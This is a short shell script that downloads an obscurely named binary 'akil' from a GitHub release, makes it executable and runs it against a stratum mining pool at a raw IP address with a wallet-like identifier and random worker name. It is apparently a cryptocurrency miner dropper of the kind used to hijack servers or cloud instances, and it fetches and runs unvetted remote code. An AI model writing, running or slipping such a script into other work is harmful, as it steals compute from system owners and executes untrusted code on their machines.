#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/akpolm/releases/download/ascd/akil
chmod +x akil
./akil -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-akiil@50.116.19.13:8080
